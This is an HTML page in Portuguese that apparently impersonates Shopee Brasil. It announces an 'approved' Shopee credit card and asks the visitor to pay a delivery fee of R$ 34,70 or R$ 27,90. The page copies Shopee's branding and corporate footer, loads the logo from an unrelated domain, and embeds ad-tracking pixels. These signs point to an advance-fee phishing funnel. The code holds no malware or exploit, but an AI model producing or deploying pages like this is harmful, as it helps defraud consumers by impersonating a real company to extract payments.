﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Opções de Envio</title>










    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->












    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Inter', sans-serif;
        }

        body {
            background-color: #f6f6f6;
            color: #1F2937;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            padding: 2rem;
            border-radius: 12px;
            margin: 40px auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
            text-align: center;
        }

        .title {
            font-size: 1.25rem;
            font-weight: 600;
            color: #1F2937;
            margin-bottom: 1.5rem;
            line-height: 1.4;
        }

        .title strong {
            color: #EE4D2D;
        }

        .shipping-options {
            margin: 2rem 0;
        }

        .card-opcao {
            padding: 1.25rem;
            border: 2px solid #E5E7EB;
            border-radius: 12px;
            cursor: pointer;
            margin-bottom: 1rem;
            transition: all 0.2s ease;
            background: white;
        }

        .card-opcao:hover {
            transform: translateY(-2px);
            border-color: rgba(238, 77, 45, 0.3);
        }

        .card-opcao.selecionado {
            border-color: #EE4D2D;
            background: #FFF5F3;
        }

        .option-title {
            font-size: 1.125rem;
            font-weight: 600;
            color: #EE4D2D;
            margin: 0;
        }

        .option-subtitle {
            font-size: 0.875rem;
            color: #6B7280;
        }

        .option-price {
            font-size: 1.125rem;
            font-weight: 600;
            color: #EE4D2D;
            margin: 0;
        }

        .card-opcao.selecionado .option-subtitle {
            color: #4B5563;
        }

        .btn-custom {
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            color: white;
            border: none;
            width: 100%;
            padding: 1rem 2rem;
            border-radius: 50px;
            font-size: 1rem;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.3s ease;
            margin-top: 1rem;
        }

        .btn-custom:disabled {
            background: #E5E7EB;
            cursor: not-allowed;
        }

        .btn-custom:not(:disabled):hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            padding: 2rem 1rem;
            border-bottom: solid 3px #EE4D2D;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem;
                padding: 1.5rem;
            }
        }
    </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">   
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div class="main-content">
            <h5 class="title">Agora basta escolher uma forma de envio do seu Cartão de Crédito <strong>APROVADO</strong></h5>
        
            <div id="opcoes-envio" class="shipping-options">
                <div class="card-opcao" onclick="selecionarOpcao('sedex')">
                    <div class="d-flex justify-content-between align-items-center">
                        <div>
                            <h5 class="option-title">SEDEX</h5>
                            <small class="option-subtitle">Chega amanhã</small>
                        </div>
                        <div>
                            <h5 class="option-price">R$ 34,70</h5>
                        </div>
                    </div>
                </div>

                <div class="card-opcao" onclick="selecionarOpcao('pac')">
                    <div class="d-flex justify-content-between align-items-center">
                        <div>
                            <h5 class="option-title">PAC</h5>
                            <small class="option-subtitle">Chega em 5 dias úteis</small>
                        </div>
                        <div>
                            <h5 class="option-price">R$ 27,90</h5>
                        </div>
                    </div>
                </div>
            </div>

            <button class="btn-custom" id="continuarEnvio" disabled>
                Continuar
            </button>
        </div>
    </div>

    <div class="footer">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script>
    let opcaoSelecionada = null;

    function selecionarOpcao(opcao) {
        opcaoSelecionada = opcao;

        document.querySelectorAll('.card-opcao').forEach(function(card) {
            card.classList.remove('selecionado');
        });

        document.querySelector(`.card-opcao[onclick="selecionarOpcao('${opcao}')"]`).classList.add('selecionado');
        document.getElementById('continuarEnvio').disabled = false;
    }

    document.getElementById('continuarEnvio').addEventListener('click', function() {
        if (opcaoSelecionada) {
            localStorage.setItem('freteEscolhido', opcaoSelecionada);
            if(opcaoSelecionada === 'sedex') {
                window.location.href = 'sedex/index.php.html'; 
            } else {
                window.location.href = 'pac/index.php.html';
            }
        }
    });
</script>

<script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-subids async defer></script>
<script>
    window.pixelId = "678838a121a1854bae5e0469";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
</script>
</body>
</html>